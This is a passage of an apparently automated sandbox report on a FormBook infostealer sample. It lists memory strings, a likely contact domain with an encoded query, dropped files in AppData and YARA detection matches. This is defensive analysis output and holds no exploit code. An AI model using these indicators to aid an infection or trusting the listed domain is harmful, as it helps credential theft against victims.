Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: PO20012ZAS23JULY2020.exe, 00000000.00000002.247350015.0000000005970000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.294068167.000000000BF00000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001D.00000002.487237651.0000000006020000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001E.00000002.491934175.00000000055E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: tzypqb0hdn.exe, 0000001E.00000002.491934175.00000000055E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: PO20012ZAS23JULY2020.exe, 00000000.00000002.247350015.0000000005970000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.294068167.000000000BF00000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001D.00000002.487237651.0000000006020000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001E.00000002.491934175.00000000055E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: PO20012ZAS23JULY2020.exe, 00000000.00000002.247350015.0000000005970000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.294068167.000000000BF00000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001D.00000002.487237651.0000000006020000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001E.00000002.491934175.00000000055E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: PO20012ZAS23JULY2020.exe, 00000000.00000002.247350015.0000000005970000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.294068167.000000000BF00000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001D.00000002.487237651.0000000006020000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001E.00000002.491934175.00000000055E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: PO20012ZAS23JULY2020.exe, 00000000.00000002.247350015.0000000005970000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.294068167.000000000BF00000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001D.00000002.487237651.0000000006020000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001E.00000002.491934175.00000000055E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: PO20012ZAS23JULY2020.exe, 00000000.00000002.247350015.0000000005970000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.294068167.000000000BF00000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001D.00000002.487237651.0000000006020000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001E.00000002.491934175.00000000055E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: PO20012ZAS23JULY2020.exe, 00000000.00000002.247350015.0000000005970000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.294068167.000000000BF00000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001D.00000002.487237651.0000000006020000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001E.00000002.491934175.00000000055E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: PO20012ZAS23JULY2020.exe, 00000000.00000002.247350015.0000000005970000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.294068167.000000000BF00000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001D.00000002.487237651.0000000006020000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001E.00000002.491934175.00000000055E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: PO20012ZAS23JULY2020.exe, 00000000.00000002.247350015.0000000005970000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.294068167.000000000BF00000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001D.00000002.487237651.0000000006020000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001E.00000002.491934175.00000000055E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: PO20012ZAS23JULY2020.exe, 00000000.00000002.247350015.0000000005970000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.294068167.000000000BF00000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001D.00000002.487237651.0000000006020000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001E.00000002.491934175.00000000055E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: PO20012ZAS23JULY2020.exe, 00000000.00000002.247350015.0000000005970000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.294068167.000000000BF00000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001D.00000002.487237651.0000000006020000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001E.00000002.491934175.00000000055E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: PO20012ZAS23JULY2020.exe, 00000000.00000002.247350015.0000000005970000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.294068167.000000000BF00000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001D.00000002.487237651.0000000006020000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001E.00000002.491934175.00000000055E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: PO20012ZAS23JULY2020.exe, 00000000.00000002.247350015.0000000005970000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.294068167.000000000BF00000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001D.00000002.487237651.0000000006020000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001E.00000002.491934175.00000000055E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: PO20012ZAS23JULY2020.exe, 00000000.00000002.247350015.0000000005970000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.294068167.000000000BF00000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001D.00000002.487237651.0000000006020000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001E.00000002.491934175.00000000055E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: WWAHost.exe, 0000000E.00000002.498035775.0000000003B99000.00000004.00000001.sdmp	String found in binary or memory: http://www.inmoregistrocanarias.com
Source: WWAHost.exe, 0000000E.00000002.498455159.0000000003E8F000.00000004.00000001.sdmp	String found in binary or memory: http://www.inmoregistrocanarias.com/?fp=7zqhj%2Bp3PAIzxwIR0jTSlHhmqr3LUhx8Qd3zOyRRDCz41XUGl8Nv0lihhI
Source: WWAHost.exe, 0000000E.00000002.498035775.0000000003B99000.00000004.00000001.sdmp	String found in binary or memory: http://www.inmoregistrocanarias.com/te/
Source: PO20012ZAS23JULY2020.exe, 00000000.00000002.247350015.0000000005970000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.294068167.000000000BF00000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001D.00000002.487237651.0000000006020000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001E.00000002.491934175.00000000055E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: PO20012ZAS23JULY2020.exe, 00000000.00000002.247350015.0000000005970000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.294068167.000000000BF00000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001D.00000002.487237651.0000000006020000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001E.00000002.491934175.00000000055E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: PO20012ZAS23JULY2020.exe, 00000000.00000002.247350015.0000000005970000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.294068167.000000000BF00000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001D.00000002.487237651.0000000006020000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001E.00000002.491934175.00000000055E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: PO20012ZAS23JULY2020.exe, 00000000.00000002.247350015.0000000005970000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.294068167.000000000BF00000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001D.00000002.487237651.0000000006020000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001E.00000002.491934175.00000000055E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: tzypqb0hdn.exe, 0000001E.00000002.491934175.00000000055E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: PO20012ZAS23JULY2020.exe, 00000000.00000002.247350015.0000000005970000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.294068167.000000000BF00000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001D.00000002.487237651.0000000006020000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001E.00000002.491934175.00000000055E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: PO20012ZAS23JULY2020.exe, 00000000.00000002.247350015.0000000005970000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.294068167.000000000BF00000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001D.00000002.487237651.0000000006020000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001E.00000002.491934175.00000000055E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: PO20012ZAS23JULY2020.exe, 00000000.00000002.247350015.0000000005970000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.294068167.000000000BF00000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001D.00000002.487237651.0000000006020000.00000002.00000001.sdmp, tzypqb0hdn.exe, 0000001E.00000002.491934175.00000000055E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000002.00000000.307481451.0000000013DA3000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: WWAHost.exe, 0000000E.00000003.421890594.0000000000675000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: WWAHost.exe, 0000000E.00000003.421890594.0000000000675000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: WWAHost.exe, 0000000E.00000002.491823014.0000000002E68000.00000004.00000001.sdmp, WWAHost.exe, 0000000E.00000003.421890594.0000000000675000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
Source: WWAHost.exe, 0000000E.00000003.421890594.0000000000675000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld255
Source: WWAHost.exe, 0000000E.00000002.489753807.0000000000670000.00000004.00000020.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: WWAHost.exe, 0000000E.00000003.421890594.0000000000675000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033-4LMEM
Source: WWAHost.exe, 0000000E.00000003.421890594.0000000000675000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033=
Source: WWAHost.exe, 0000000E.00000003.421890594.0000000000675000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: WWAHost.exe, 0000000E.00000003.421890594.0000000000675000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.

Source: tzypqb0hdn.exe, 0000001D.00000002.475789725.00000000012CB000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000000.00000002.243951607.00000000039DE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.486023523.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.487779904.0000000001340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.322786943.0000000000F80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.476866137.000000000406B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.323161625.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.485232592.000000000356B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.491846641.0000000002EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.322548757.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.488951197.0000000000450000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.492090705.0000000003350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 34.2.tzypqb0hdn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.PO20012ZAS23JULY2020.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.PO20012ZAS23JULY2020.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.tzypqb0hdn.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Detected FormBook malware

Show sources

Source: C:\Windows\SysWOW64\WWAHost.exe	Dropped file: C:\Users\user\AppData\Roaming\NL0NN0SE\NL0logri.ini			Jump to dropped file
Source: C:\Windows\SysWOW64\WWAHost.exe	Dropped file: C:\Users\user\AppData\Roaming\NL0NN0SE\NL0logrv.ini			Jump to dropped file

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000000.00000002.243951607.00000000039DE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.243951607.00000000039DE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000022.00000002.486023523.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000022.00000002.486023523.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000022.00000002.487779904.0000000001340000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000022.00000002.487779904.0000000001340000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.322786943.0000000000F80000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.322786943.0000000000F80000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
